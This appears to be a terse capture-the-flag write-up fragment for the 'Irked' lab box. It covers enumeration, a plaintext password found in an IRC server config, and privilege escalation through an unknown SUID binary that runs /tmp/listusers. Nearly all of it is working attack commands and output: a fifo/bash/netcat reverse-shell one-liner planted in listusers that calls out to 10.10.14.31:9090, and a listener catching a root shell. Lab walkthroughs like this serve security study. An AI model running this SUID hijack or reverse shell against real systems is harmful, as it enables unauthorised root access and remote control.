4 box enum

PEAS

-rwsr-xr-x 1 root   root       7.2K May 16  2018 /usr/bin/viewuser (Unknown SUID binary)

ircd@irked:~$ grep -rnw /home/ircd -ie password --color=always 2>/dev/null
/home/ircd/Unreal3.2/unrealircd.conf:695:       password        moocowsrulemyworld;

[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/bin/procmail
/usr/bin/X
/usr/bin/viewuser
ircd@irked:/tmp$ strings /usr/bin/viewuser
sh: 1: /tmp/listusers: not found

ircd@irked:~$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.31 9090 >/tmp/f' > listusers
ircd@irked:~$ chmod 777 listusers

/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-06-06 16:41 (:0)
rm: cannot remove ‘/tmp/f’: No such file or directory

$ rlwrap nc -lvnp 9090
listening on [any] 9090 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.117] 42960
whoami;id
root
uid=0(root) gid=1001(ircd) groups=1001(ircd)

Last updated